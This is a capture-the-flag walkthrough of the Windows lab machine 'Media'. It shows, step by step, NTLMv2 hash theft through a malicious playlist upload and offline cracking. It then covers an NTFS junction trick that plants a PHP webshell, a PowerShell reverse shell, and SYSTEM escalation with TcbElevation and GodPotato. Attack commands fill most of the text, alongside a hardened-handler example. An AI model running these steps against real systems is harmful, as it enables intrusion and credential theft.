Introduction
Media is a Windows machine running an Apache/XAMPP web stack with a custom PHP application. The site has a job application form that lets you upload a "video file" - which we weaponise to steal an NTLMv2 hash. The path to root:
- Enumeration → find a job application upload form on the web server
- NTLM hash capture → craft a malicious Windows Media Player playlist file, upload it, capture the hash with Responder
- Crack the hash → recover enox's plaintext password, SSH in (user flag here)
- Source code review → read `index.php` to understand how upload paths are generated
- NTFS Junction attack → trick the upload handler into writing a PHP webshell into the Apache web root
- Web shell → reverse shell → get a shell as `nt authority\local service`
- Privilege escalation → abuse `SeTcbPrivilege` to add `enox` to Administrators
- Root flag → SSH back in as `enox` (now admin), read `root.txt`
Key Concepts
What is NTLMv2? When Windows connects to a network resource (like an SMB share), it authenticates with a challenge-response protocol: the server sends a random challenge and the client answers with an HMAC-MD5 keyed by a value derived from the user's NT hash. That answer is what Responder logs and what people loosely call the "NTLMv2 hash" (more precisely a Net-NTLMv2 response). It isn't the password and it can't be used for pass-the-hash, but anyone who can get Windows to connect to them can capture it - and because the challenge is known, it can be cracked offline with a wordlist.
What is Responder? A tool that pretends to be various network services (SMB, HTTP, etc.) and logs every authentication attempt made to it. When a victim’s machine connects and tries to authenticate, Responder captures the NTLMv2 hash automatically.
What is XAMPP? A popular all-in-one web server package for Windows that bundles Apache, PHP, and MySQL. The default web root is C:\xampp\htdocs\ - any PHP file placed there is executed by Apache when requested in the browser.
What is an NTFS Junction? Windows NTFS (the file system) supports “junction points” - a type of directory symlink. You can make a folder appear to point somewhere else entirely. If an application creates files inside what it thinks is folder A, but folder A is actually a junction to folder B, the files end up in folder B. We use this to redirect the upload handler into writing to C:\xampp\htdocs\ instead.
What is SeTcbPrivilege? A powerful Windows privilege called “Act as part of the operating system.” It allows code to impersonate any user - including Administrator - without knowing their password. Service accounts sometimes have it, and it can be abused to run arbitrary commands in any user’s context.
What is SeImpersonatePrivilege? A less powerful (but more common) Windows privilege that lets a process impersonate the token of a client that has authenticated to it. LOCAL SERVICE and NETWORK SERVICE hold it by default, but a service can be started with a reduced privilege set that drops it; a tool called FullPowers can recover the account's default privileges. Once you have it, "Potato" exploits (GodPotato, SweetPotato) can escalate you straight to SYSTEM.
Enumeration
Nmap
nmap -Pn -A --top-ports 3000 media.vl
Open ports:
| Port | Service | Notes |
|---|---|---|
| 22 | SSH (OpenSSH for Windows) | Our way in after cracking the hash |
| 80 | Apache 2.4.56 / PHP 8.1.17 | The target web app |
| 3389 | RDP | Not needed for this box |
The HTTP title is “ProMotion Studio” - a fictitious media/graphics company.
Web Application
Browsing to http://media.vl shows a hiring page with a form:
- First name, last name, email
- Upload field: “Upload a brief introduction video (compatible with Windows Media Player)”
Why does "Windows Media Player" matter? Windows Media Player (WMP) supports playlist file formats like `.wax` and `.asx`. A playlist entry can reference a remote location, including a UNC path such as \\<attacker>\share\video.wmv. When WMP opens the playlist it tries to fetch that entry, Windows connects to the attacker over SMB and silently authenticates with the credentials of whoever opened the file - leaking a Net-NTLMv2 response.
Foothold: NTLMv2 Hash Capture
Generate malicious WMP files
Clone the ntlm_theft tool and generate files pointing to your attacker IP:
git clone https://github.com/Greenwolf/ntlm_theft
python3 ntlm_theft.py -g all -s <YOUR_IP> -f media
Among the many files this generates are media/media.wax, media/media.asx, and media/media.m3u, each pointing at your IP. The .wax and .asx formats work best here - they open directly in WMP.
Start Responder
sudo responder -I tun0
Responder will now listen for incoming SMB authentication attempts on your tun0 interface.
Upload the file
Fill in the form with any values and upload media.asx:
firstname: test
lastname: test
email: test@test.null
After a few seconds, Responder catches the hash:
[SMB] NTLMv2-SSP Username : MEDIA\enox
[SMB] NTLMv2-SSP Hash : enox::MEDIA:91b120fafb76f6b5:545C46A5...
What happened? Someone on the server opened the uploaded file with Windows Media Player, which tried to stream the UNC path embedded in it - pointing at your machine. Windows authenticated over SMB with enox's credentials without prompting, and Responder completed the NTLM challenge-response and logged the Net-NTLMv2 response together with its own challenge.
Crack the hash
# -m 5600 = NetNTLMv2; enox_hash.txt holds the "enox::MEDIA:..." line from Responder
hashcat -m 5600 -a 0 enox_hash.txt rockyou.txt
Password: 1234virus@
SSH in
ssh enox@media.vl
# password: 1234virus@
enox@MEDIA C:\Users\enox>
✅ User flag captured. C:\Users\enox\Desktop\user.txt
Lateral Movement: NTFS Junction → Web Shell
Read the source code
As enox, list C:\ and spot the XAMPP install:
dir C:\
Read the web app source:
type C:\xampp\htdocs\index.php
The key lines from index.php:
$uploadDir = 'C:/Windows/Tasks/Uploads/'; // base upload directory
$folderName = md5($firstname . $lastname . $email);
$targetDir = $uploadDir . $folderName . '/';
What does this tell us? The app stores every upload inside a subfolder of C:\Windows\Tasks\Uploads\. The subfolder name is the MD5 hash of the three form fields concatenated. We already know our test values were test, test, test@test.null - which produces the folder name 317d52e7c825dd847d9c750a35547edc. We can verify this locally:
echo -n testtesttest@test.null | md5sum
# 317d52e7c825dd847d9c750a35547edc
Confirm on the target:
dir C:\Windows\Tasks\Uploads\
# d----- ... 317d52e7c825dd847d9c750a35547edc
Check Apache htdocs permissions:
icacls.exe C:\xampp\htdocs\
# NT AUTHORITY\LOCAL SERVICE:(I)(OI)(CI)(F)
NT AUTHORITY\LOCAL SERVICE (the Apache service account) has Full Control over htdocs: (F) is Full Control, (OI)(CI) means it is inherited by files and subfolders. Our current user (enox) has Full Control over the Uploads folder (check with icacls C:\Windows\Tasks\Uploads), so we can delete and recreate anything under it. This is the pivot point.
Create the NTFS Junction
Remove the existing upload folder and replace it with a Junction that points to htdocs. Unlike a symbolic link, a junction needs no special privilege - write access to the parent folder is enough:
# PowerShell
Remove-Item C:\Windows\Tasks\Uploads\317d52e7c825dd847d9c750a35547edc\ -Recurse
New-Item -ItemType Junction -Path "C:\Windows\Tasks\Uploads\317d52e7c825dd847d9c750a35547edc" -Target "C:\xampp\htdocs"
Or with cmd.exe:
mklink /J C:\Windows\Tasks\Uploads\317d52e7c825dd847d9c750a35547edc C:\xampp\htdocs
What just happened? The upload folder name is now a junction point. When the PHP app writes a file to C:\Windows\Tasks\Uploads\317d52e7c825dd847d9c750a35547edc\, it actually writes it to C:\xampp\htdocs\ - directly into the Apache web root.
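The path derivation and the junction redirect, as an added example (not code from the write-up or from the ProMotion Studio app). It runs in a temporary directory: "Uploads" stands in for C:\Windows\Tasks\Uploads, "htdocs" for C:\xampp\htdocs, and a directory symlink stands in for the NTFS junction created with mklink /J (on Windows you would create the junction itself, which unlike a symlink needs no privilege). `vulnerable_save` mirrors what index.php effectively does; `hardened_save` is the check a fixed handler should make, and is my addition, not something the app contains.

```python
"""Upload-path logic from index.php, the junction redirect, and a hardened handler.
Added example for this write-up; paths and the symlink-for-junction stand-in are assumptions."""
import hashlib
import os
import shutil
import tempfile

WEBSHELL = b"<?php system($_GET['cmd']); ?>"


def upload_folder_name(firstname: str, lastname: str, email: str) -> str:
    """Mirror of the PHP: md5($firstname . $lastname . $email)."""
    return hashlib.md5((firstname + lastname + email).encode()).hexdigest()


def vulnerable_save(upload_base: str, folder: str, filename: str, data: bytes) -> str:
    """What the app does: build <base>/<md5>/<file> and write, trusting the folder is a plain directory."""
    target_dir = os.path.join(upload_base, folder)
    os.makedirs(target_dir, exist_ok=True)      # silently follows a junction/symlink
    path = os.path.join(target_dir, filename)
    with open(path, "wb") as fh:
        fh.write(data)
    return path


def hardened_save(upload_base: str, folder: str, filename: str, data: bytes) -> str:
    """Refuse if the folder is a link/junction or resolves outside the upload base.
    os.path.realpath follows junctions on Windows; os.path.isjunction exists from Python 3.12."""
    base_real = os.path.realpath(upload_base)
    target_dir = os.path.join(upload_base, folder)
    if os.path.lexists(target_dir):
        is_junction = getattr(os.path, "isjunction", lambda p: False)(target_dir)
        if os.path.islink(target_dir) or is_junction:
            raise PermissionError(f"{target_dir} is a reparse point")
        if os.path.commonpath([base_real, os.path.realpath(target_dir)]) != base_real:
            raise PermissionError(f"{target_dir} resolves outside {base_real}")
    else:
        os.mkdir(target_dir)
    path = os.path.join(target_dir, filename)
    with open(path, "wb") as fh:
        fh.write(data)
    return path


def demo() -> dict:
    """Legitimate upload, then the junction swap, against both handlers."""
    root = tempfile.mkdtemp()
    uploads, htdocs = os.path.join(root, "Uploads"), os.path.join(root, "htdocs")
    os.makedirs(uploads)
    os.makedirs(htdocs)
    folder = upload_folder_name("test", "test", "test@test.null")
    try:
        # 1. First submission: Uploads/<md5>/media.asx is created as intended.
        first = vulnerable_save(uploads, folder, "media.asx", b"<asx/>")
        # 2. enox, who can write to Uploads, replaces that folder with a link to htdocs
        #    (stand-in for: mklink /J Uploads\<md5> C:\xampp\htdocs).
        shutil.rmtree(os.path.join(uploads, folder))
        os.symlink(htdocs, os.path.join(uploads, folder), target_is_directory=True)
        # 3. Second submission with identical form values gives the same md5,
        #    so the "upload" is written through the link into htdocs.
        vulnerable_save(uploads, folder, "cmd.php", WEBSHELL)
        landed = os.path.isfile(os.path.join(htdocs, "cmd.php"))
        # 4. The hardened handler refuses the same request.
        try:
            hardened_save(uploads, folder, "cmd2.php", WEBSHELL)
            blocked = False
        except PermissionError:
            blocked = True
        return {"folder": folder,
                "first_upload_in_uploads": first.startswith(uploads),
                "webshell_in_htdocs": landed,
                "hardened_blocked": blocked}
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    print(demo())
```

The check in `hardened_save` still leaves a check-then-write window an attacker with write access to Uploads could race; the real fix is to keep the upload base somewhere low-privileged users cannot create reparse points, and to open the target with reparse points refused (FILE_FLAG_OPEN_REPARSE_POINT on Windows, O_NOFOLLOW on POSIX) rather than relying on a path string.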
Create and upload the webshell
On your attacker machine, create cmd.php:
# quote the delimiter so the shell doesn't expand $_GET to an empty string
cat << 'EOF' > cmd.php
<?php
system($_GET['cmd']);
?>
EOF
Now re-submit the form with the same test/test/test@test.null values and upload cmd.php.
Verify RCE
curl "http://media.vl/cmd.php?cmd=whoami"
# nt authority\local service
It works. The webshell is live in the Apache root.
Get a reverse shell
Start a listener:
nc -lvnp 10001
Trigger a PowerShell reverse shell via the webshell (use Revshells.com to generate a Base64 PowerShell payload for your IP/port):
curl "http://media.vl/cmd.php?cmd=powershell%20-e%20<BASE64_PAYLOAD>"
PS C:\xampp\htdocs> whoami
nt authority\local service
Privilege Escalation: SeTcbPrivilege → Administrator
Check privileges
whoami /priv
SeTcbPrivilege Act as part of the operating system Disabled
SeTcbPrivilege is present. "Disabled" only means it is in the token but not currently enabled - any process running under this token can enable it with AdjustTokenPrivileges; it has not been removed.
What is SeTcbPrivilege? "Act as part of the operating system" is one of the most powerful Windows privileges. It allows code to create logon sessions for any user and run commands in their context - without knowing their password. There's a public PoC called TcbElevation that exploits this to run an arbitrary command as SYSTEM.
Download and run TcbElevation
Serve the binary from your machine:
python3 -m http.server 8000
On the target (as nt authority\local service):
iwr http://<YOUR_IP>:8000/TcbElevation-x64.exe -outfile TcbElevation-x64.exe
.\TcbElevation-x64.exe elevate 'net localgroup Administrators enox /add'
Verify:
net localgroup Administrators
# Administrator
# enox ← added!
SSH back in as enox (now admin)
ssh enox@media.vl
# password: 1234virus@
enox@MEDIA C:\Users\enox> dir c:\users\administrator\desktop
# root.txt
✅ Root flag captured. C:\Users\Administrator\Desktop\root.txt
Alternative Privilege Escalation: SeImpersonate → SYSTEM
If you prefer to escalate straight to SYSTEM instead of adding to Administrators, use this path from the nt authority\local service shell:
Restore SeImpersonatePrivilege with FullPowers
Service accounts often run with SeImpersonatePrivilege stripped from their token. FullPowers recovers it by registering a scheduled task that runs as the same service account with the account's default privilege set, then spawning a shell from that task:
iwr http://<YOUR_IP>:8000/FullPowers.exe -outfile FullPowers.exe
.\FullPowers.exe
C:\Windows\system32> whoami /priv
# SeImpersonatePrivilege Impersonate a client after authentication Enabled
Potato exploit → SYSTEM
With SeImpersonatePrivilege restored, use GodPotato to run a command as SYSTEM:
iwr http://<YOUR_IP>:8000/GodPotato-NET4.exe -outfile GodPotato-NET4.exe
.\GodPotato-NET4.exe -cmd 'powershell -e <BASE64_REVERSE_SHELL>'
PS C:\xampp\htdocs> whoami
nt authority\system
What is a Potato exploit? A family of Windows privilege escalation exploits (RottenPotato, JuicyPotato, SweetPotato, GodPotato) that all abuse the SeImpersonatePrivilege right. They coerce a SYSTEM-level COM/RPC service into authenticating to a local endpoint the attacker controls, then impersonate the resulting token to spawn a SYSTEM process.
Summary
nmap → port 80 (Apache/PHP), port 22 (SSH)
↓
http://media.vl → job application form with WMP upload
↓
ntlm_theft → generate media.asx / media.wax
↓
Responder -I tun0 + upload media.asx
↓
NTLMv2 hash captured: MEDIA\enox
↓
hashcat + rockyou.txt → password: 1234virus@
↓
ssh enox@media.vl → USER FLAG
↓
type C:\xampp\htdocs\index.php → upload path = md5(firstname+lastname+email)
↓
echo -n testtesttest@test.null | md5sum → 317d52e7c825dd847d9c750a35547edc
↓
Remove upload folder → mklink /J <folder> C:\xampp\htdocs
↓
Re-upload cmd.php with same form values → lands in C:\xampp\htdocs\
↓
curl http://media.vl/cmd.php?cmd=whoami → nt authority\local service
↓
Trigger reverse shell via webshell
── Path A (SeTcbPrivilege) ──────────────────────────────
whoami /priv → SeTcbPrivilege present
TcbElevation-x64.exe elevate 'net localgroup Administrators enox /add'
ssh enox@media.vl → dir C:\Users\Administrator\Desktop → ROOT FLAG
── Path B (SeImpersonate / Potato) ──────────────────────
FullPowers.exe → restores SeImpersonatePrivilege
GodPotato-NET4.exe → reverse shell as nt authority\system → ROOT FLAG
Tools Used
| Tool | What it does | How to get it |
|---|---|---|
| ntlm_theft | Generates malicious files (WMP playlists, Office docs, etc.) that trigger NTLM auth | git clone https://github.com/Greenwolf/ntlm_theft |
| Responder | Listens for and captures NTLMv2 hashes over SMB/HTTP | Built into Kali; sudo responder -I tun0 |
| hashcat | GPU-accelerated password cracker | sudo apt install hashcat |
| TcbElevation | PoC that abuses SeTcbPrivilege to run commands as any user | github.com/antonioCoco/TcbElevation |
| FullPowers | Restores default privileges (SeImpersonate, SeAssignPrimaryToken) for service accounts | github.com/itm4n/FullPowers |
| GodPotato | Abuses SeImpersonatePrivilege to escalate to SYSTEM | github.com/BeichenDream/GodPotato |
| Revshells.com | Generates reverse shell payloads (PowerShell Base64, etc.) | revshells.com |